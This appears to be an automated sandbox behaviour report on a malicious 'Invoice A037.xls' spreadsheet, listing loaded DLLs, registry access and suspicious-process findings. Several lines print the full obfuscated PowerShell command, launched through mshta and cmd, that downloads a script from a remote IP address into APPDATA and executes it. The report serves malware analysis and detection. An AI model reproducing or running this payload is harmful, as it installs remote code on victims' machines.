Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: Invoice A037.xls

Static file information: File size 1072128 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.pdb source: powershell.exe, 00000008.00000002.457674292.00000000029D5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.pdbhP source: powershell.exe, 00000016.00000002.498637562.0000000002673000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.pdb source: powershell.exe, 00000016.00000002.498637562.0000000002673000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.pdbhP source: powershell.exe, 00000008.00000002.457674292.00000000030D7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: .pdbB source: powershell.exe, 00000016.00000002.501343114.000000001AD68000.00000004.00000020.00020000.00000000.sdmp

Source: Invoice A037.xls

Initial sample: OLE indicators encrypted = True

Data Obfuscation

PowerShell case anomaly found

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"

Suspicious command line found

